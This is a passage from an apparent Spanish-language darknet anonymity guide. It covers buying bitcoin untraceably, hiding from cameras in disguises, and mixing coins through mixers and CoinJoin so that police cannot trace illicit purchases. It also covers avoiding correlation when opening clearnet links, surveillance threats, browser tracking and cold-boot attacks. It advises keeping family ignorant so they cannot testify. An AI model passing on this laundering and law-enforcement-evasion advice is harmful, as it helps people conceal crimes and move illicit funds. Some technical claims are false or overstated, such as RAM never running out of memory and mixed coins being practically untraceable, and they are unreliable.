forma de financiar nuestra cuenta, pero algunos de ellos ofrecen una forma de transferir dinero directamente desde nuestra cuenta bancaria. Obviamente, podemos ver que al hacerlo estamos exponiendo nuestro verdadera identidad a los intercambios de una forma u otra, y si no, al menos nuestra ubicación. 2. LocalBitcoins LocalBitcoins nos ofrece una forma de encontrar una persona en nuestro área local, o si deseamos ir a otro pais o provincia para encontrarnos con alguien más lejos, podemos elegir dónde buscar personas en esa área que venden Bitcoins, ya sea online (transferencia bancaria o depósito en efectivo) o encuentros en efectivo y en persona. Los comerciantes tienen listas de reputación, similares a una puntuación de comentarios en eBay, pudiendo encontrar un comerciante que tenga una buena reputación para comprar. Enviamos una solicitud comercial y una vez que el vendedor ha recibido el dinero, podemos liberar los Bitcoins de LocalBitcoins, enviandoselos a su billetera. Algunas personas han expresado su preocupación de que la policía pueda actuar como compradores y vendedores en LocalBitCoins, pero no importa, siempre y cuando no deseemos comprar grandes cantidades. También podemos, si lo deseamos, comunicarnos con el comprador por correo electrónico, llegar desde el transporte público, usar sombrero y todo tipo de trucos de agente secreto para tratar de ocultar nuestra identidad. Usa una peluca si eres extremadamente súper paranoico. 3. Usa un cajero automático de Bitcoin Actualmente, hay pocos cajeros automáticos en el mundo. Afortunadamente, las compañías están lanzando estos cajeros automáticos de forma progresiva. Es probable que haya alguna método para tratar de reducir el lavado de dinero haciendo que verifiques tu identificación, pero por lo que entiendo, actualmente solo lo hacen si estás vendiendo Bitcoins por dinero en efectivo usando el cajero automático, y no si los compras por dinero en efectivo. La forma en que funciona, es que eliges la cantidad de BTCs que deseas comprar y alimentas con efectivo el cajero automático. En ese momento puedes imprimir una billetera de papel generada o elegir una billetera propia para enviar las Bitcoins. Este método puede ser otra buena forma porque requiere tratar con otro ser humano fuera de la transacción. Algo de lo que debemos estar al tanto, son las cámaras de vigilancia, así que tal vez sería aconsejable usar capucha, sombrero, peluca, lentes de sol, etc. para disfrazarnos si estamos preocupados por nuestra identidad. 4. Craigslist Lo creas o no, hay una cantidad decente de personas en Craigslist con la que puedes comprar bitcoins face to face con dinero en efectivo. Es posible que en tu área local no tengas una gran cantidad disponible, pero siempre puedes buscar en otras áreas metropolitanas cercanas y hacer una excursión diaria si lo deseas. Las mismas consideraciones sobre la protección de nuestra identidad se aplicarian aquí.(Podemos encontrar de igual forma en sitios como Milanuncios, MercadoLibre, Ebay ...) 5. Mina tus propios Bitcoins No voy a entrar en cómo extraer Bitcoins, o si deberías o no, pero si quieres obtener Bitcoins sin tratar con otras personas, esta es una de las formas en que puedes hacerlo. Ejecuta a tus mineros sobre Tor, mantente en el anonimato y tendrás algunos Bitcoins sin contaminar. Está bien, entonces ahora que tenemos algunos Bitcoins, ¿cómo podemos traspasarlos a otra persona con la que queremos comprar algo o comerciar con él? Como probablemente ya sepa, cada transacción se registra en BlockChain.info. Podemos consultar las transacciones relacionadas con cada wallet, yendo a la siguiente dirección: http:// blockchain.info /address/Dirección del wallet Si tienes bitcoins en tu billetera, y se los envías a otra persona, aparecerán en BlockcChain, indicando exactamente donde los enviaste. Por ello, un par de cosas a tener en cuenta: 1. Si has comprado con tus Bitcoins a alguien o algo ilicito, es posible que hayan guardado un registro de la billetera a la que se enviaron las monedas. 2. Si un agente del orden público o alguien que intente rastrearnos, podría ver dónde se envían los BTCs tras ser enviados a otra persona. En este momento, el mejor método para tratar de perder el rastro, es usar algo que se llama mezclador o mixer. Es más o menos como tirar tus Bitcoins en una pila gigante de monedas con otros usuarios y luego retirarlas en un momento posterior de la mezcladora. Si lanzaste 1 bitcoin y sacaste 1 bitcoin, piensa en todas las otras personas que hicieron exactamente lo mismo. Posiblemente miles de personas retiren 1 Bitcoin del mismo montón de monedas. Ahora nos hemos vuelto mucho más difíciles de rastrear y ser vinculados con esos BTCs. Tal vez no retiremos 1 Bitcoin, tal vez solo retiremos 0.5 Bitcoins ahora mismo y dejemos los otros 0.5 Bitcoin en el mezclador. Esto, hara mucho más difícil vincular dichos Bitcoins con nosotros. Un sitio web que hace esto se llama Coinmixer Coinmixer ha existido desde hace un tiempo y la mayoría de la gente parece estar contenta con el servicio que brindan. La forma en que trabajan es como mencioné anteriormente, y además de eso, el servicio cobra una comisión de 1% - 3% en cada depósito. Así que podemos poner 1.0 Bitcoins y sacar 0.97 Bitcoins después de las tarifas y mexclarlo. También podmeos decidir cuándo deseamos retirarlo, ya sea en un mes, una semana, días, etc. Este es un buen servicio para usar. Lo único que debemos tener en cuenta es que hay un rastro nuestro enviando monedas a Coinmixer, y algunas personas pueden sospechar o no de nuestras intenciones. Pero lo que hagamos con nuestras monedas después de Coinmixer será extremadamente difícil de rastrear, si no es casi imposible, debido a la gran cantidad de transacciones que se producen dentro y fuera de Coinmixer. Cuando retiremos nuestras monedas de Coinmixer, asegúrate de enviarlas a una nueva billetera, y no a la misma billetera que utilizamos para depositarlas en Coinmixer. Otra opción que podemos tener al retirar las monedas de Coinmixer, es conseguir que Coinmixer retire las monedas directamente a la persona de la que deseamos comprar algo. Simplemente ten en cuenta las tarifas de transacción para asegurarnos de que nuestro vendedor deseado reciba la cantidad correcta de Bitcoins necesaria para la compra o el intercambio. Blockchain.info proporciona otras dos opciones que podemos utilizar, crear una billetera e iniciándose sesión en ella y enviar monedas compartidas. Enviar monedas compartida es otra forma de mezclar monedas, la forma en la que funciona es que envia el dinero a un bote gigante y se empareja con otra persona que está enviando la misma cantidad. Un ejemplo de esto es: Tenemos 4 personas. A, B y X, Y. La persona A está enviando 1 Bitcoin a la persona B y la persona X está enviando 1 Bitcoin a la persona Y. El envio compartido (Send Shared) hará coincidir estas cantidades, y las mezclará para que la persona A envíe sus 1 Bitcoin a la persona Y y la persona X envie su Bitcoin a la persona B. De esta manera estás rompiendo la cadena que vincula a la persona A con la persona B porque no hay registro de que la persona A haya enviado algo a la persona B. Esto es una muy buena opción para usar, y muchas personas lo prefieren. Por supuesto, hay muchas personas que usan Send Shared, por lo que la probabilidad de que nos rastreen, es prácticamente imposible. La moneda compartida usa un método diferente llamado coinjoin. Shared coin aloja un servidor coinjoin que actúa como un punto de encuentro para que varias personas se unan en una sola transacción. Tener varias personas en una transacción mejora la privacidad al hacer las transacciones más difíciles de analizar. La distinción importante entre los servicios de mezcla tradicionales es que el servidor no puede confiscar ni robar tus monedas. Una transacción de coincoin se verá más o menos así. Como podemos ver, múltiples entradas y salidas hacen que la determinación del emisor y receptor real sea mucho más difícil. Básicamente enviamos las monedas dentro y fuera de muchas carteras diferentes que están participando en la opción "moneda compartida" en ese momento, lanzando cientos o miles de transacciones en todas las carteras que participan por lo que es extremadamente difícil de seguir. El inconveniente es que coinjoin nunca puede cortar por completo el vínculo entre la entrada y la dirección de destino, siempre habrá una conexión entre ellos, es simplemente más difícil de analizar. El beneficio de Shared Coin es que, mientras se realiza este procesamiento, podemos presionar cancelar y recuperar nuestras monedas. Cuando enviamos nuestras monedas a un servicio de mezcla tradicional, un servicio de mezcla poco confiable, nos podrian robar las mismas. Ahora que tenemos el conocimiento para tomar una decisión informada sobre cómo mezclar nuestras monedas en el camino hacia nuestro destino esta más claro. ## Clearnet VS Hidden Services : ¿Por qué debemos tener cuidado? Como probablemente ya sepamos, un Hidden Service es un sitio web que utiliza una dirección .onion y un sitio clearnet usa Internet regular. Debemos estar en TOR para acceder a la red de tor, mientras que se puede acceder a los sitios de clearnet desde cualquier navegador. ¿por qué debes tener cuidado cuando visites los sitios de clearnet? Cuando veamos un artículo, enlace o video publicado en los foros de la DarkNet, ten en cuenta que solo debemos ver esos videos a través de TOR o posiblemente como último recurso, usar una VPN y aquí está el por qué. Usemos YouTube, por ejemplo. YouTube es propiedad de Google, Google rastrea todo . YouTube realiza un seguimiento de qué direcciones IP buscan qué videos y almacena toneladas de metadatos sobre sus usuarios. Cuando se publica un enlace a un video de YouTube en los foros DarkNet, es probable que tengamos que usar nuestros navegadores habituales para mirarlo porque el navegador Tor no es bueno para ver videos en flash. Pero el problema es que si se escribió una publicación en un foro DarkNet el 10 de Mayo de 2018 recomendando un video, y este video solo tiene 500 visitas, tal vez este video haya estado en marcha durante unos meses y no haya terminado siendo muy popular. En los pocos días que se publicó este artículo, 50 personas que están viendo el foro de DarkNet donde esta ese video. El número de visitas simplemente subió en un corto período de tiempo. Es extremadamente fácil correlacionar, las personas que vieron ese video de YouTube, especialmente porque no es un video popular, y que vinieron de la DarkNet, y si cometimos el error de usar nuestra dirección IP real, nos hemos agregado a una lista de personas de "interés" automaticamente. Si lo hacesmos varias veces con diferentes videos de YouTube, entonces comienzamos a generar un patrón y, antes de que nos desmos cuenta, tendremos a las autoridades monitorizandonos. Si usamos una VPN, hace esto un poco más difícil, ya que no podrán vincularnos con el video. Pero una vez que ven una dirección VPN que aparece constantemente en los videos que se vinculan desde los foros DarkNet, las autoridades enviaran una orden judicial para supervisar las actividades de los usuarios de la VPN. HideMyAss fue uno de los ejemplos más conocidos de VPN que recibieron la orden de entregar información sobre sus usuarios, y lo hicieron sin problemas. Pues, lo mismo ocurre con todos los sitios clearnet. Nunca se sabe quién está monitorizando nuestra actividad. Cuando alguien publica un enlace de clearnet en los foros y las personas visitan ese enlace usando una dirección IP desprotegida, se puede comenzar a correlacionar patrones en nuestra contra. Entonces, ¿qué puedes hacer para protegerte? Pregúntate primero, ¿realmente necesito ver ese video de YouTube? ¿Es algo importante que necesito ver? Si es así, podríamos considerar la opción de la que hablé anteriormente llamada Tortilla. Hay un caso infame de un asesino que llamó a la hermana de su víctima desde el teléfono celular de la víctima. Llamó desde su Time Square en Nueva York y la insulto y habló sobre cómo estaba torturando a su hermana, la policía rastreo el teléfono. Desafortunadamente, debido a que Time Square es un lugar tan concurrido, incluso con todas las cámaras, no pudieron precisar exactamente qué persona estaba haciendo la llamada desde ese teléfono y nunca atraparon al tipo. Terminó abandonando el teléfono después de que finalmente mató a su víctima. Se sabían que era un tipo caminando por Time Square con un teléfono celular, pero si alguna vez has estado en Time Square, sabes que hay millones de personas haciendo exactamente lo mismo, él simplemente se mezcló. Es posible que deseemos utilizar un wifi público en un área concurrida que tenga muchos usuarios durante todo el día para ver un video y mantener nuestra dirección IP segura. Si no podemos mirar videos de forma segura sin identificarnos, entonces no los veas. Es tan simple como esto. Sí, sé que es molesto que en Tor no funcione bien los videos flash, pero esto es mejor que delatarnos. Esta parte se escribe para recordar que la correlación de dos usuarios en Internet es muchos más fácil de lo que cree. Una vez que comience a desarrollar patrones y ha dejar huellas, el gobierno tiene un espacio de almacenamiento ilimitado disponible para realizar un seguimiento de todo lo que haces (No tiene limitaciones de SIEM). ¿Recuerdas cómo capturaron a Sabu? Inició sesión en un IRC con su dirección IP real, una vez . Una vez es todo lo que necesitan para derrotarte. Siempre piensa antes de abrir un enlace, ¿qué guardará este sitio web acerca sobre mí? ## Te están observando - Virus, Malware, Vulnerabilidades Tu ordenador siempre será vulnerable a algún tipo de ataque por parte de aquellos que quieren hacerte daño de alguna forma. Si se trata de dañar tu privacidad, robar tu información o llevarte a la cárcel. No debería sorprendernos que el gobierno de EE.UU. sea en realidad el mayor comprador de malware. Según un nuevo informe, el gobierno de los Estados Unidos es, de hecho, el mayor comprador de malware del mundo gracias al cambio hacia la ciberseguridad "ofensiva" y nos está dejando a todos vulnerables en el proceso. Para que el gobierno pueda explotar las vulnerabilidades descubiertas en el software principal, no puede revelar esas vulnerabilidades a los fabricantes o al público, para que no se solucione el problema. > Mi trabajo consistía en tener 25 días-cero en una memoria USB, listas para funcionar Esto fue lo que dijo a Reuters un ex ejecutivo de un contratista de defensa. El contratista de defensa compraba las vulnerabilidades de los Hackers independientes y las convertía en exploit para que el gobierno las utilizase como arma cibernética ofensiva. Después de revisar las fuentes y artículos, algunos de estos contratistas de defensa expresaron su preocupación de que el gobierno esencialmente estaba financiando actividades delictivas. Están pagando hackers independientes, en algunos casos blackhats para encontrar exploits de día cero y comprar estos exploits por grandes sumas de dinero, más de 100,000 €. Si está usando un portátil con micrófono y cámara incorporadq, es extremadamente vulnerable a un ataque como explica John McAffee, el hombre que inició McAfee Anti-Virus. Exactamente dijo en una charla : "Si necesito información sobre ti, te prometo que, dentro de tres días, puedo encender la cámara del ordenador de tu casa y ver lo que esté haciendo". Entonces, lo primero que debemos hacer es poner una pegatina opaca o una pegatina especial para tapar la webcam.Si estás en un escritorio y tienes una cámara web conectada, desenchúfela a menos que la estémos utilizando. No hay razón para darle a un atacante una ventana abierta a nuestro hogar. El siguiente es su micrófono, nuevamente los equipos de escritorio generalmente no tienen micrófonos incorporados, pero la mayoría de las portátiles sí. Se puede activar un micrófono para escucharte hablando y por ello, necesita encontrar una forma de desactivarlo físicamente. La mejor forma, por supuesto, es eliminarlo físicamente.(En modo paranohia) El FBI desarrolló un software de registro de teclas llamado Magic Lantern. Según los informes, Magic Lantern se puede instalar de forma remota, a través de un archivo adjunto de correo electrónico o mediante la explotación de vulnerabilidades comunes del sistema operativo, a diferencia de los Keyloggers anteriores utilizados por el FBI. Se ha descrito de diversas maneras, como un virus y un Troyano. No se sabe cómo el programa podía almacenar o comunicar las pulsaciones de las teclas. El FBI tenia la intención de desplegar Magic Lantern en forma de un archivo adjunto de correo electrónico. Cuando se abriese el archivo adjunto, se instala un Troyano en el ordenador del sospechoso. El Troyano se activa cuando el sospechoso utiliza el cifrado PGP, que a menudo se utiliza para aumentar la seguridad de los mensajes de correo electrónico enviados. Cuando se activa, el troyano registrará la contraseña de PGP, que permitirá al FBI descifrar las comunicaciones del usuario. Portavoces del FBI pronto confirmaron la existencia del programa llamado Magic Lantern, pero negaron que se hubiera desplegado, y se negaron a comentar más. Por supuesto, tambien tenemos smartphones que se pueden activar de forma remota. Los smartphones se pueden activar de forma remota, sin necesidad de acceso físico. Esta característica de "error itinerante" ha sido utilizada por las agencias de aplicación de la ley y los servicios de inteligencia para escuchar conversaciones cercanas. Según algunas de las fuentes del artículo de la Wikipedia, el smartphone se puede activar para escucharte, incluso cuando está apagado. Sacar la batería probablemente lo inhabilitará, pero no hay garantías. Así que asegúrese de que el teléfono no esté en la misma habitación que tu si estamos hablando de algo delicado (En el documental Snowden se ve como el mismo mete los telefonos en un microondas). Como siempre, sé súper paranoico. Enciende la ducha y pon el teléfono en el baño si es necesario, o mejor aún, si vas a ir a algún lugar y no necesitas el teléfono, déjalo en casa. Como la mayoría de las personas nunca salen de su casa sin sus teléfonos, si alguien nos está observando, podría pensar que todavía estamos en su casa. Al primer grupo de personas que fue a visitar a Snowden en Rusia se les dijo que no trajeran ningun portátil o teléfono con ellos por estas razones. Sabemos que el gobierno está tratando activamente de obtener acceso remoto a tu ordenador, pueden escuchar tus teléfonos, ¿qué debemos hacer al respecto? Debemos hacer todo lo posible para asegurarsarnos de que los ordenadores que usamos no estén expuestas a los elementos de riesgo. Siempre deshabilite Javascript cuando visite cualquier sitio web a menos que el sitio web sea 100% fiable. Comienza a eliminar gradualmente el uso de Microsoft Windows y MAC OSX porque estos sistemas operativos de código cerrado no están abiertos al escrutinio y auditan la forma en que se encuentran las distribuciones de código abierto de Linux. Hay más usuarios de Windows y, por lo tanto, más exploits disponibles para Windows. Ejecuta tu sistema operativo en una máquina virtual, incluso si tu sistema operativo anfitrión es Linux (recuerde que Virtual Box puede funcionar en Linux) ayudará a reducir la retención de cualquier malware que pueda detectar cuando estamos en Internet. No vayas a ningún sitio potencialmente dañino en tu libertad. No abras ningún correo electrónico de ninguna persona en la que no confíes al 100%. Formatea regularmente tus discos duros para mantenerlos limpios de cualquier virus oculto. Si no estas seguro de si algo es seguro, pruébelo en un ordenador que solo esté diseñada para pruebas y otra que no esté conectada a Internet. Si puedes reiniciar tu sector de arranque en tu disco duro de vez en cuando, sería una buena idea también, ya que podemos obtener virus maestros del sector de arranque que reiniciarían un virus antes de que el ordenador arranque en el sistema operativo. Controla tu BIOS, la BIOS es lo primero que se ejecuta al encender tu ordenador, si tienes un virus en tu BIOS, no hay un antivirus que pueda eliminarlo, necesitarías flashear tu BIOS e instalar un nuevo firmware. Asegúrese de que el firmware sea 100% confiable ya que el firmware infectado es la forma más común de obtener un virus BIOS. ## Monitoriza con una antena Lo primero que quiero que hagas es encontrar una forma segura de ver este video. Recuerda que registran a todos los que miran estos videos y, las personas que frecuentan la DarkNet, serán observadas aún más de cerca. [Vídeo](https://www.youtube.com/watch?v=Kaq9P9B2BM0) Este video muestra cómo usar una antena, sentado en una camioneta fuera de nuestro hogar. De hecho, muchas personas especulan con que los nuevos medidores inteligentes instalados en muchos hogares ya cuentan con esta tecnología para determinar electrónicamente todo lo que estás haciendo en tu hogar. Los teclados con cable e inalámbricos emiten ondas electromagnéticas, ya que contienen componentes electrónicos. Esta radiación electromagnética podría revelar información sensible, como las pulsaciones de teclas, como se muestra en el video. Cada onda electromagnética es exclusiva del dispositivo que las usa, lo que da a una persona que le espía la capacidad de diferenciar entre el ordenador en comparación con el lavavajillas. De acuerdo con las personas que hicieron este experimento, pudieron extender el alcance hasta 20 metros utilizando tecnología relativamente barata. Esto fue para teclados cableados por cierto, explicando que los teclados y ratones inalámbricos son aún más fáciles. Lo que nos lleva a otro área de interés, las transmisiones inalámbricas. Cosas como los teclados inalámbricos y los ratones inalámbricos (¿o los ratones?) También son vulnerables a las "escuchas". Si no usamos una encriptación lo suficientemente fuerte como para enviar datos al receptor, cualquiera puede estar escuchando las teclas presionadas y la actividad del mouse. Probablemente, algo en lo que la mayoría de la gente nunca pensaría, Microsoft ha actualizado el cifrado débil que se encuentra en los teclados inalámbricos de mercado masivo de hoy con un nuevo diseño que usa AES de 128 bits para asegurar la comunicación desde y hacia el PC. ``` Hasta ahora, el cifrado del teclado ha sido débil, con claves elegidas de una pequeña paleta de posibilidades. Un grupo de Hackers afirmó en 2009 que había desarrollado una herramienta específica para snifar las pulsaciones de teclado de Microsoft en un rango de hasta 10 metros . ``` ¿Estás usando tecnología inalámbrica? ¿Qué edad tienes? Puede ser el momento de actualizar stu equipo. 10 metros es poco, pero recuerde que la tecnología disponible por el gobierno podría potencialmente ir más allá. Luego, hay otras cosas que la gente olvida, como los monitores inalámbricos que transmiten tu pantalla a un receptor que puede recogerlo. Piensa en las viejas antenas que la gente solía tener en la parte superior de sus casas, y cómo de lejos podían capturar las señales de las estaciones de televisión, si tenías una de esas apuntandote desde una camioneta al otro lado de la calle, no hay duda de que podrían estar escuchando a escondidas tus actividades íntimas. Un investigador pudo usar una señal inalámbrica enviada por un medidor inteligente hasta 300 metros de distancia, para averiguar de qué casa provenía y cuál era el consumo de energía actual en texto sin formato. Luego, pudo usar esta información para determinar cuándo las personas estaban y no estaban en el hogar debido al aumento promedio del consumo ya que los medidores emiten pulsos cada 30 segundos. Los datos enviados eran en texto plano y llevaban el número de identificación del medidor y su lectura. El nombre del propietario de la casa o la dirección no están incluidos, pero cualquier persona suficientemente motivada podría averiguar rápidamente la fuente. "La identificación del medidor estaba impresa en la parte frontal del medidor que miramos, por lo que teóricamente podrías leer el ID, desactivada en un medidor objetivo e intentar snifar paquetes". En sus pruebas, Xu descubrió que podía sacar paquetes del aire de los medidores meta entre una vez cada 2 - 10 minutos. Eso es lo suficientemente rápido como para poder calcular el consumo de energía promedio de una casa y notar que comienza a deducirse cuando alguien está en casa. Cosas como temporizadores, valdría la pena invertir para que siempre parezca que alguien está en casa hasta que los investigadores de seguridad comiencen a buscar formas de evitar la puerta abierta que estamos dando a cualquiera que quiera encontrar datos sobre nosotros. ¿Qué podemos hacer con este tipos de escuchas? No mucho, a menos que quieras comenzar a convertirte en un tipo de persona con sombrero de hojalata. Sin embargo, hay algunas cosas divertidas que puedes hacer si quieres volverte loco, te recomiendo el siguiente sitio Y-SHIELD - Pintura protectora de alta frecuencia YShield ``` Pintura de base acuosa fácil de aplicar para paredes, techos, puertas y otras superficies interiores o exteriores. Muy efectivo para bloquear señales de teléfonos, señales de CB, TV, AM, FM, radiación de radiofrecuencia y microondas. ¡Probado altamente efectivo hasta 18 GHz! ``` También hay muchas otras cosas como cortinas, prendas de vestir, telas, etc. que interrumpen la transmisión de señales. Depende completamente de nosotros lo que deseamos hacer, solo damos las opciones y la educación para que podamos tomar una decisión educada sobre cómo de lejos deseamos ir para proteger nuestra privacidad. ## Cookies y Javascript, más cookies de Flash y otros seguimientos del navegador Tu navegador puede revelar una cantidad alarmante de información sobre ti. Sorprendentemente, o no demasiado sorprendente, cuando visitamos un sitio web hay una cantidad enorme de datos de identificación que se envían al sitio web con el que se nos estamos comunicando. ### Cookies Las cookies son piezas de información que un sitio web puede enviar a tu navegador. Si tu navegador los "acepta", serán enviadas de regreso al sitio cada vez que el navegador acepte una página, imagen o script del mismo. Una cookie establecida por la página/sitio que está visitando es una cookie de "segunda parte". Una cookie establecida por otro sitio que solo proporciona una imagen o secuencia de comandos (un anunciante, por ejemplo), se denomina cookie de "terceros". Las cookies son los mecanismos más comunes utilizados para registrar el hecho de que un visitante en particular ha ingresado a una cuenta de un sitio, y para rastrear el estado de una transacción de varios pasos, como una reserva o carrito de compras. Como resultado, no es posible bloquear todas las cookies sin perder la capacidad de iniciar sesión en muchos sitios y realizar transacciones en otros. Desafortunadamente, las cookies también se usan para otros fines que afectan menos a los intereses de los usuarios, como registrar el uso de un sitio durante un largo período de tiempo o incluso rastrear y correlacionar sus visitas a muchos sitios separados, a través de cookies asociadas a anuncios publicitarios, por ejemplo. Con los navegadores recientes, la configuración de cookies que ofrece a los usuarios la compensación más pragmática entre la funcionalidad dependiente de cookies y la privacidad es permitir que las cookies permanezcan hasta que el usuario cierre el navegador, también conocido como "cookies de sesión". Tails lo hace automáticamente con Iceweasel. Además de las cookies habituales que los navegadores web envían y reciben, y que los usuarios han comenzado a conocer y administrar para su privacidad, las empresas han seguido implementando nuevas "características" que se comportan como cookies pero que no se gestionan de la misma manera. Adobe ha creado "Objetos almacenados locales" (también conocidos como "Flash Cookies") como parte de sus complementos de Flash, Mozilla ha incorporado una función llamada "almacenamiento DOM" en las versiones recientes de Firefox. Los sitios web pueden usar cualquiera o ambos, además de las cookies para rastrear a los visitantes. Se recomienda que los usuarios tomen medidas para evitar esto. Administrar la privacidad de almacenamiento DOM de Mozilla/Firefox. Si usas un navegador Mozilla, puedes desactivar las pseudo cookies de DOM escribiendo: about: config en la barra de URL. Esto abrirá una extensa llena de opciones de configuraciones internar del navegador. Escribe "almacenamiento" en el cuadro de filtro y presione regresar. Deberíamos ver una opción llamada dom.storage.enabled. Cámbielo a "falso" haciendo clic con el botón derecho y seleccionando Alternar. ### Administrar la privacidad de Adobe Flash. Adobe enumera consejos sobre cómo deshabilitar las cookies Flash en tu sitio web. Hay algunos problemas con las opciones que ofrece Adobe (por ejemplo, no existe la opción "solo sesión"), por lo que probablemente sea mejor configurar globalmente el espacio del Objeto Almacenado Local en 0 y solo cambiarlo para los sitios que deseamos tener un seguimiento. En la versión de Linux del complemento Flash de Adobe, no parece haber una manera de establecer el límite en 0 para todos los sitios y, por lo tanto, su uso debe limitarse o evitarse. Afortunadamente, Tails no tiene flash instalado, pero en caso de que no estemos utilizando Tails, debemos tenerlo en cuenta. Si necesitas ver un video online, busque una manera de descargar el video al ordenador y verlo posteriormente. Esto saca al navegador del proceso de procesar un video y elimina esas cookies Flash que nos ayudan a identificarnos. ### Javascript Javascript es probablemente el gran padre de todas las vulnerabilidades en la navegación por Internet. La mayoría de los exploits, malware, virus y otras formas de toma de control de los ordenadores suceden debido a la ejecución de código Javascript en el navegador. Javascript tiene muchos usos. Algunas veces se usa simplemente para hacer que las páginas web se vean más llamativas al hacer que respondan a medida que el ratón se mueve o cambie continuamente. En otros casos, javascript agrega significativamente a la funcionalidad de una página, lo que le permite responder a las interacciones del usuario sin la necesidad de hacer clic en un botón "enviar" y esperar a que el servidor web envíe una nueva página de respuesta. Desafortunadamente, javascript también contribuye a muchos problemas de seguridad y privacidad en la web. Si una parte maliciosa puede encontrar una forma de tener tu javascript incluido en una página, pueden usarlo para todo tipo de maldad: hacer que los enlaces cambien a medida que el usuario hace clic en ellos, enviar nombres de usuario y contraseñas a lugares equivocados, informar de gran cantidad de datos sobre el navegador de los usuarios a un sitio. Javascript suele formar parte de esquemas para rastrear personas en la Web o, lo que es peor, para instalar malware en las computadoras de las personas. Lo mejor es deshabilitar Javascript ( about: config en la barra de URL buscar Javascript y Alternarlo en deshabilitado ) a menos que confíemos plenamente en el sitio o usemos el complemento del navegador NoScripts que viene con Tails y está disponible en Firefox para bloquear al menos selectivamente scripts maliciosos y deshabilitar Javascript directamente. Supuestamente, NoScript no bloquea todo el Javascript, incluso cuando está habilitado y no hay sitios en la lista blanca. Hay un complemento de Firefox (que también funciona en el navegador Tor) llamado toggle_js que nos permite alternar el parámetro about: config javascript.enable a través de un icono de la barra de herramientas para que no tengamos que estar entrando en about: config . Bastante útil la verdad. Javascript también puede revelar una cantidad alarmante de información sobre nosostros, incluso si estamos utilizando TOR o una VPN, incluidos los complementos del navegador, nuestra zona horaria , qué fuentes hemos instalado (flash también lo hace) y, por supuesto, la mayoría de los navegadores envíe tu agente, lo que significa que le estamos diciendo al sitio web qué navegador estamos utilizando y, en algunos casos, tu sistema operativo. Es posible que algunos de estos detalles no sean muy importantes, pero recopilados en su totalidad, puede facilitar la identificación de quién está online al generar casi una huella digital con nuestra configuración específica relacionada con nuestro navegador. Cuando saltas de un sitio a otro con tu huella dactilar, nos pueden extraer correlaciones y patrones de esta información y, finalmente, vincularlo con nosotros si no somos extremadamente cuidadosos. Afortunadamente, Tails y Whonix anulan la mayoría de esta información de identificación, por lo que siempre que usemos Tails con Javascript deshabilitado, o al menos con NoScripts (Flash se desactiva automáticamente), podemos reducir la cantidad de información que compartimos. Decir, que no siempre es posible navegar con Tails, por lo que estas son cosas que debemos tener en cuenta cuando navegamos con navegadores regulares en nuestro sistema operativo nativo con nuestro navegador. Veamos lo que nuestro navegador está revelando sobre nosotros en esta página. No lo visites desde tu dirección IP real(Ya sabes por qué). Podemos ver la información obtenida navegando por el menú lateral. ## Algunas recomendaciones de ciberseguridad Aquí hay algunas recomendaciones que podemos pasar a un usuario promedio. 1. Nunca dejes desatendido el ordenador que utilizas. Esto puede parecer obvio, pero si tiene hijos, o un cónyuge o un hermano que no entiende lo que haces en el ordenador, deciden usar su cuenta, iniciar sesión en su correo electrónico, Facebook o hacer cosas que podrían comprometer nuestra ubicación mientras estaba en el ordenador, podría potencialmente causarnos problemas. Tal vez nos estemos conectando a través de múltiples capas como esta TOR -> VPN (1) -> TOR -> VPN (2), por lo que son 4 capas y VPN (2) es la dirección IP que todos ven. Si nuestro hijo o cónyuge abre su correo electrónico con esa dirección IP y luego cierra la misma sin nuestro conocimiento. Esa VPN ahora está vinculada a nosotros. Y recordamos, es probable que las compañías den información sobre sus clientes para evitar multas, cierres y enjuiciamiento. 1. No digas a tus familiares lo que estás haciendo, solo dales instrucciones para que no toquen el ordenador. Nunca debes contarle a nadie lo que estás haciendo en el ordenador, porque si alguna vez se presentara un agente de la ley, cinterrogaría a tu familia y amigos. Si honestamente no lo saben, no pueden ser acusados por un tribunal, por lo que es mejor mantenerlos en la oscuridad. O tal vez la policía podría asustarlos para que cuenten todos sus secretos porque le dicen a tu familia que si no confiesan, tu y ellos irán a la cárcel, posiblemente por un tiempo prolongado. Simplemente ingresa en el ordenador con contraseña y nunca lo dejes desatendido con la pantalla desbloqueada. 2. Si usamos varias capas para conectarnos, asegúrese de verificar regularmente que todas estén intactas. Las VPN pueden caerse algunas veces sin previo aviso y, aunque nunca debes configurar tu sistema, de modo que si una capa cae, lo pierdes todo, solo ten en cuenta tu forma de navegar hasta que levantes la siguiente capa. Esta es una de las cosas que me gustan de Tortilla, si mi capa TOR no funciona, no la omite y pasa a la siguiente capa, sino que simplemente deja de funcionar. Cuando las VPN caen, el ordenador evita la VPN descartada y pasa a la siguiente capa, que en algunos casos podría ser la dirección IP real. Os recomiendo encarecidamente Tortilla. 3. No uses la misma contraseña para múltiples foros, mercados, correos electrónicos, etc. Espera que uno o más de los sitios web en los que estás registrado almacene nuestra contraseña en texto plano. Esto significa que si alguien encuentra un exploit y vuelque la base de datos, pueda encontrar nuestra contraseña. Si usamos la misma contraseña para otros sitios, y mismo nombre de usuario, nuestra lista completa de cuentas se verá comprometida. Siempre usa contraseñas diferentes y manténlas fuertes. No permitas que nada sobre su contraseña identifique cómo eliges la misma, ni identifique nada personal sobre nosotros. ## Ataques de arranque frío, extracción de RAM no conectada ¿Sabía que incluso si nuestro sistema está encriptado en un disco completo, nuestros datos aún se pueden extraer utilizando algo llamado ataque de arranque en frío? Lo primero de lo que tenemos que hablar es de RAM. RAM significa memoria de acceso aleatorio. Todo lo que necesitamos saber sobre la memoria RAM es que la memoria RAM es el lugar en una computadora donde se guardan el sistema operativo, los programas de aplicación y los datos en uso actual para que el procesador del ordenador los pueda acceder rápidamente. La memoria RAM es mucho más rápida de leer y escribir que otros tipos de almacenamiento en una computadora, disco duro, disquete y CD-ROM. Sin embargo, los datos en RAM permanecen allí solo mientras el ordenador esté funcionando. Cuando apagas el ordenador, la RAM pierde sus datos. Cuando enciendes el ordenador de nuevo, tu sistema operativo y otros archivos se cargan nuevamente en la RAM, generalmente desde tu disco duro. La memoria RAM se puede comparar con la memoria a corto plazo de una persona y el disco duro con la memoria a largo plazo. La memoria a corto plazo se centra en el trabajo en cuestión. Si la memoria a corto plazo se llena, su cerebro a veces puede actualizarla de hechos almacenados en la memoria a largo plazo. Un ordenador también funciona de esta manera. Si la RAM se llena, el procesador necesita ir continuamente al disco duro para superponer los datos antiguos en la RAM con datos nuevos, ralentizando la operación del ordenador. A diferencia del disco duro, que puede estar completamente lleno de datos, la RAM nunca se queda sin memoria. Los datos se pueden extraer de la RAM usando varias herramientas. Cuando tienes un documento de texto abierto y estás trabajando en él, estámos trabajando desde la RAM. Lo que significa que si estámos 